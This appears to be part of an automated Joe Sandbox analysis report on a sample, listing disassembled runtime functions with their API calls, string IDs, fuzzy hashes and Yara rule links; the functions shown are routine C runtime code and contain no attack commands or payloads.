                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalEnterSection_errno_invalid_parameter_noinfo_lockwcscpy_swcslen
                                                                                                          • String ID: "
                                                                                                          • API String ID: 3068024670-123907689
                                                                                                          • Opcode ID: 323bbd3666154e27f64a783b9239975cb72f4b4f02a0c12f26a83ae7cc961600
                                                                                                          • Instruction ID: d3438ee2c2e2fe30d51aeb6293bedda17c4d622ba2c5824c0a177509476608d5
                                                                                                          • Opcode Fuzzy Hash: 323bbd3666154e27f64a783b9239975cb72f4b4f02a0c12f26a83ae7cc961600
                                                                                                          • Instruction Fuzzy Hash: D321F2B594134ADBDBD1BFF4888459E77A0AF04359F10553EE522DB180C730B6408BA1
                                                                                                          Function 6FDCEF07 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 78COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _mbsrchr.MSVCR100(6FDCF396,0000002E,?,?,?,6FDCF396,00000400,?), ref: 6FDCEF58
                                                                                                          • _mbsicmp.MSVCR100(00000000,.exe,?,?,?,6FDCF396,00000400,?), ref: 6FDCEF6B
                                                                                                          • _mbsicmp.MSVCR100(00000000,.cmd,?,?,?,6FDCF396,00000400,?), ref: 6FDCEF7C
                                                                                                          • _mbsicmp.MSVCR100(00000000,.bat,?,?,?,6FDCF396,00000400,?), ref: 6FDCEF8D
                                                                                                          • _mbsicmp.MSVCR100(00000000,.com,?,?,?,6FDCF396,00000400,?), ref: 6FDCEF9E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _mbsicmp$_mbsrchr
                                                                                                          • String ID: .bat$.cmd$.com$.exe
                                                                                                          • API String ID: 1759011909-4019086052
                                                                                                          • Opcode ID: a1cc9a83d738563823217b68ebe6f2ee921580da427f7ad8c4cc93d842e264f0
                                                                                                          • Instruction ID: 8fdb80c8524a97ecea5610c3d9d8a71ce8e6565503092fa4dfbccb949da8d803
                                                                                                          • Opcode Fuzzy Hash: a1cc9a83d738563823217b68ebe6f2ee921580da427f7ad8c4cc93d842e264f0
                                                                                                          • Instruction Fuzzy Hash: 0A117DAB50C74158F7810316DC037C627CE8FC1278F254226E484DF0C1DF29F1468263
                                                                                                          Function 6FDD0611 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 78COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • wcsrchr.MSVCR100(6FDA7F90,0000002E,?,?,?,6FDA7F90,00000400,?), ref: 6FDD0666
                                                                                                          • _wcsicmp.MSVCR100(00000000,.exe,?,?,?,6FDA7F90,00000400,?), ref: 6FDD0679
                                                                                                          • _wcsicmp.MSVCR100(00000000,.cmd,?,?,?,6FDA7F90,00000400,?), ref: 6FDD068A
                                                                                                          • _wcsicmp.MSVCR100(00000000,.bat,?,?,?,6FDA7F90,00000400,?), ref: 6FDD069B
                                                                                                          • _wcsicmp.MSVCR100(00000000,.com,?,?,?,6FDA7F90,00000400,?), ref: 6FDD06AC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmp$wcsrchr
                                                                                                          • String ID: .bat$.cmd$.com$.exe
                                                                                                          • API String ID: 2496260227-4019086052
                                                                                                          • Opcode ID: 206dfaba749d19c0614f8d6769a45f8ae92fb51bd133bd6c283aeb5d5095b9e8
                                                                                                          • Instruction ID: ecf502abde2d0772c60e05acf7d99743451b48ad5cbc85a0eb4c67c5c19466e4
                                                                                                          • Opcode Fuzzy Hash: 206dfaba749d19c0614f8d6769a45f8ae92fb51bd133bd6c283aeb5d5095b9e8
                                                                                                          • Instruction Fuzzy Hash: 21113D77A0971197B28413159C0D79B23A9DFD27F4F15A026F478DA0C8EF68F48543A4
                                                                                                          Function 6FD9849C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 60COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _getptd$CreateFrameInfo
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 4181383844-1018135373
                                                                                                          • Opcode ID: ee9433f339cb7b9da5782f5a658190c2ebd1158e1dd95009b2f6654185de1b39
                                                                                                          • Instruction ID: 1ad19effd982d10d3949960158b0dac6edef347ada7f99e88781ec80af7632a8
                                                                                                          • Opcode Fuzzy Hash: ee9433f339cb7b9da5782f5a658190c2ebd1158e1dd95009b2f6654185de1b39
                                                                                                          • Instruction Fuzzy Hash: F111D335448700CFC7E09FB5D448BA973B8BF00B65F94866AC5AA8B5A1EB34F4458FA1
                                                                                                          Function 6FD8232B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 53COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • malloc.MSVCR100(?), ref: 6FD82336
                                                                                                            • Part of subcall function 6FD80233: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6FD80B42,00000001,00000001,00000001,?,6FD8A974,00000018,6FD8A948,0000000C,6FDA74F7), ref: 6FD80263
                                                                                                          • _callnewh.MSVCR100(?), ref: 6FDAF2A8
                                                                                                          • ??0exception@std@@QAE@ABQBDH@Z.MSVCR100(?,00000001), ref: 6FDAF2DF
                                                                                                          • atexit.MSVCR100(6FE209C8,?,00000001), ref: 6FDAF2EF
                                                                                                          • ??0exception@std@@QAE@ABV01@@Z.MSVCR100(6FE28518), ref: 6FDAF2F9
                                                                                                          • _CxxThrowException.MSVCR100(?,6FD8C888,6FE28518), ref: 6FDAF30A
                                                                                                          • _errno.MSVCR100 ref: 6FDAF319
                                                                                                          • _errno.MSVCR100 ref: 6FDAF326
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??0exception@std@@_errno$AllocExceptionHeapThrowV01@@_callnewhatexitmalloc
                                                                                                          • String ID: bad allocation
                                                                                                          • API String ID: 1227329287-2104205924
                                                                                                          • Opcode ID: 5257180eef7a34b23935c7a13970a84c8958caa451c32b4a6a5303f622c5179b
                                                                                                          • Instruction ID: 30efedf5120e3d65b30b6330b86fce785c8d5f51c85166b9875fb8efbb60c5da
                                                                                                          • Opcode Fuzzy Hash: 5257180eef7a34b23935c7a13970a84c8958caa451c32b4a6a5303f622c5179b
                                                                                                          • Instruction Fuzzy Hash: 8F01D63550130AEADF94EBA4C81169D3BB9AF46258F100059E420A71D0EF30FB41C7A0
                                                                                                          Function 6FDCC6E7 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 50COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6FDA76A1,?,6FD8B8C3,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDCC352
                                                                                                          • free.MSVCR100(00000000,?,?,6FDA76A1,?,6FD8B8C3,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDCC355
                                                                                                          • DeleteCriticalSection.KERNEL32(FFFFFFFF,?,?,6FDA76A1,?,6FD8B8C3,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDCC37C
                                                                                                          • DecodePointer.KERNEL32(FFFFFFFF,6FDA76A1,?,6FD8B8C3,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDCC6F8
                                                                                                          • TlsFree.KERNEL32(FFFFFFFF,6FDA76A1,?,6FD8B8C3,6FD81DE0,00000008,6FD81E16,00000001,?), ref: 6FDCC716
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalDeleteSection$DecodeFreePointerfree
                                                                                                          • String ID: 0Mo$0Mo$PNo$PNo
                                                                                                          • API String ID: 1464103408-3962907252
                                                                                                          • Opcode ID: 529549035170c9220c87d2b32f630c65c7586910773f217f3db9e47f63a56451
                                                                                                          • Instruction ID: ef41ce20b42a0cc6d55744c1ac08e278c9e6b62afba15d648e9d9c72c2692f8f
                                                                                                          • Opcode Fuzzy Hash: 529549035170c9220c87d2b32f630c65c7586910773f217f3db9e47f63a56451
                                                                                                          • Instruction Fuzzy Hash: 8501F532800B90CBDAA46B28AD85A597BEDBF43630324030BF5B5D70E0DB34B8919A21
                                                                                                          Function 6FD960D3 Relevance: 15.2, APIs: 10, Instructions: 245COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000), ref: 6FD96170
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000), ref: 6FD961D6
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,6FD962D7,00000000,00000000,00000000), ref: 6FD961EF
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,6FD962D7,00000000,00000000,00000000), ref: 6FD96240
                                                                                                          • CompareStringW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 6FD96254
                                                                                                          • _freea_s.MSVCR100(00000000), ref: 6FD9625E
                                                                                                          • _freea_s.MSVCR100(00000000), ref: 6FD96267
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide$_freea_s$CompareString
                                                                                                          • String ID:
                                                                                                          • API String ID: 3891795400-0
                                                                                                          • Opcode ID: 2ee5183391d107776fc0bcc9c8501262c9da39c0e696180548db346f40bf76e7
                                                                                                          • Instruction ID: bf1b3f89979dc0cc16ac644acd626518e7f0d3e9eb794c303d3998a368e29fa2
                                                                                                          • Opcode Fuzzy Hash: 2ee5183391d107776fc0bcc9c8501262c9da39c0e696180548db346f40bf76e7
                                                                                                          • Instruction Fuzzy Hash: 2881DF72A00309DFDF818FA48D55BEE3BB2AF463A4F14411AE961A71E0D775F850CBA0
                                                                                                          Function 6FD86129 Relevance: 15.2, APIs: 10, Instructions: 194COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000100,00000001,00000000,?,?,?,?,?,?,?), ref: 6FD86178
                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 6FD861DB
                                                                                                          • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 6FD861F7
                                                                                                          • LCMapStringW.KERNEL32(?,?,?,?,00000000,?), ref: 6FD86261
                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 6FD86280
                                                                                                          • _freea_s.MSVCR100(00000000), ref: 6FD8628A
                                                                                                          • _freea_s.MSVCR100(?), ref: 6FD86293
                                                                                                          • malloc.MSVCR100(00000008), ref: 6FDB0D19
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide$String_freea_s$malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1406006131-0
                                                                                                          • Opcode ID: 7974d9fa714fff513c020a0ffcbc8ca91cceeff57e992701607ce239a177217f
                                                                                                          • Instruction ID: 97567b3d97f97358c1d9fdd26e91d27cee86ff941dff27e8b5207c91542b758e
                                                                                                          • Opcode Fuzzy Hash: 7974d9fa714fff513c020a0ffcbc8ca91cceeff57e992701607ce239a177217f
                                                                                                          • Instruction Fuzzy Hash: 1351907291020AEFEF418FA4CD84DEE3BB6EB8A364F14456AF53596150D731BC60DB60
                                                                                                          Function 6FDDE63F Relevance: 15.2, APIs: 10, Instructions: 166stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_ismbblead_l$_invalid_parameter_noinfo$strcat_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 2457174781-0
                                                                                                          • Opcode ID: 3f7a39a29aac7c04d0df9da77f075ae764cf4c3b3b22339400f9d413162b6540
                                                                                                          • Instruction ID: 49e3a3aabd3d08f9b38c073af3966b8b5c16919b1a69faceefc2b9f895cdda67
                                                                                                          • Opcode Fuzzy Hash: 3f7a39a29aac7c04d0df9da77f075ae764cf4c3b3b22339400f9d413162b6540
                                                                                                          • Instruction Fuzzy Hash: 9151033090475AEFDB929FA8C8807DDFBB4AF01324F20465AF4A49A1C1D771B981CBA1
                                                                                                          Function 6FDC2407 Relevance: 15.2, APIs: 10, Instructions: 153threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,00000000,6FDBD7F5,00000000,?,00000000,00000000), ref: 6FDC2439
                                                                                                          • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000001,?,00000000,00000000), ref: 6FDC2494
                                                                                                            • Part of subcall function 6FDC20F1: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(6FDC1F83,?,6FDC1F83,00000001), ref: 6FDC2110
                                                                                                            • Part of subcall function 6FDC20F1: _CxxThrowException.MSVCR100(?,6FE20DAC,6FDC1F83), ref: 6FDC2125
                                                                                                          • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000001,?,00000000,00000000), ref: 6FDC24A3
                                                                                                          • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000003,00000002,00000001,?,00000000,00000000), ref: 6FDC24B2
                                                                                                          • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6FDC24C1
                                                                                                          • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6FDC24D0
                                                                                                          • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000008,00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6FDC24DF
                                                                                                          • GetCurrentThread.KERNEL32 ref: 6FDC24FD
                                                                                                          • GetThreadPriority.KERNEL32(00000000), ref: 6FDC2504
                                                                                                          • ??2@YAPAXI@Z.MSVCR100(00000838), ref: 6FDC2605
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Policy$Concurrency@@ElementKey@2@@Policy@SchedulerValue@$Thread$??0exception@std@@??2@CountCriticalCurrentExceptionInitializePrioritySectionSpinThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2367327154-0
                                                                                                          • Opcode ID: 255f5ee3e72698f973df36919c954d83b5a3975bcb22ad54fe413865fb083c5a
                                                                                                          • Instruction ID: ac725a494b173f90946027b76a84c8d5f76f17b7e0e8e7b1af22f5e27ab81b1f
                                                                                                          • Opcode Fuzzy Hash: 255f5ee3e72698f973df36919c954d83b5a3975bcb22ad54fe413865fb083c5a
                                                                                                          • Instruction Fuzzy Hash: 3E6117B0B10B02AFD748CF39C491B99FBA6BF49304F40822EE46DCB640DB31B4649B91
                                                                                                          Function 6FDDE7E4 Relevance: 15.1, APIs: 10, Instructions: 134stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo$_ismbblead_lstrcpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 3061186358-0
                                                                                                          • Opcode ID: 7a3d22c57ac309fce812dded500107edca493908f29c4e6a0cb187bf19f3e53f
                                                                                                          • Instruction ID: eba77d63f4929a467e1c89ff2e9636bd0a5e56e368538acc4017b0e02fc62d9b
                                                                                                          • Opcode Fuzzy Hash: 7a3d22c57ac309fce812dded500107edca493908f29c4e6a0cb187bf19f3e53f
                                                                                                          • Instruction Fuzzy Hash: 90412231904355DFEB919F68C844B9CBBB0AF82368F10415AF8A49F2C1DB31B981C7A2
                                                                                                          Function 6FDDC170 Relevance: 15.1, APIs: 10, Instructions: 131COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDC19E
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDC1A9
                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,000000FF,?,?,?), ref: 6FDDC20B
                                                                                                          • GetLastError.KERNEL32 ref: 6FDDC215
                                                                                                          • _isleadbyte_l.MSVCR100(?,?), ref: 6FDDC23B
                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 6FDDC266
                                                                                                          • _errno.MSVCR100 ref: 6FDDC26C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide_errno$ErrorLast_invalid_parameter_noinfo_isleadbyte_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 4049637251-0
                                                                                                          • Opcode ID: 22ac5114a836ee1e2cd63aafe2e499442e1f8847e45d6b5f4c1e8cd999ff37a2
                                                                                                          • Instruction ID: 9b6ece63212ab0cc77f65a8ce067f13aea6552908a62ea8cca889c48ce8a4b3d
                                                                                                          • Opcode Fuzzy Hash: 22ac5114a836ee1e2cd63aafe2e499442e1f8847e45d6b5f4c1e8cd999ff37a2
                                                                                                          • Instruction Fuzzy Hash: 9941A032904755EFDB929FA8CD45B9A3FB4EF42364F204656F860AA2D0EB30F541CB61
                                                                                                          Function 6FD9070F Relevance: 15.1, APIs: 10, Instructions: 124COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WideCharToMultiByte.KERNEL32(00000080,00000000,6FE245D0,00000001,?,?,00000000,?,?,?,?,6FE245D0,?), ref: 6FD9076B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 626452242-0
                                                                                                          • Opcode ID: 8eb1376f631e94d5bcb6c37ca3e2be420e4e4bec76b2c4d53831da9698940bcc
                                                                                                          • Instruction ID: 83b3371d0e9a2e097ab247fe194826d872afefd12e465f217a349b483ecb6a36
                                                                                                          • Opcode Fuzzy Hash: 8eb1376f631e94d5bcb6c37ca3e2be420e4e4bec76b2c4d53831da9698940bcc
                                                                                                          • Instruction Fuzzy Hash: 0141B136500346EFDB519FB8D8D899E3BB5EF42364B01436AE4304B1D0D732BD818BA6
                                                                                                          Function 00D01139 Relevance: 15.1, APIs: 10, Instructions: 110sleepmemoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,00D022D8,00000010), ref: 00D01154
                                                                                                          • InterlockedCompareExchange.KERNEL32(00D03398,?,00000000), ref: 00D01171
                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00D0118C
                                                                                                          • _amsg_exit.MSVCR100(0000001F), ref: 00D011A2
                                                                                                          • _initterm_e.MSVCR100(00D020DC,00D020E8), ref: 00D011C3
                                                                                                          • _initterm.MSVCR100(00D020D0,00D020D8), ref: 00D011F8
                                                                                                          • InterlockedExchange.KERNEL32(00D03398,00000000), ref: 00D01210
                                                                                                          • exit.MSVCR100(00000000), ref: 00D0126C
                                                                                                          • _XcptFilter.MSVCR100(?,?), ref: 00D0127E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612452283.0000000000D01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D00000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612359297.0000000000D00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30612550523.0000000000D02000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30612649247.0000000000D04000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_d00000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExchangeInterlocked$CompareFilterHeapInformationSleepXcpt_amsg_exit_initterm_initterm_eexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 1197362976-0
                                                                                                          • Opcode ID: 0c0c0034ab63c6c38f5f2b86563cc2b694d3fa6b035523e7fb6cd6d81960d2c1
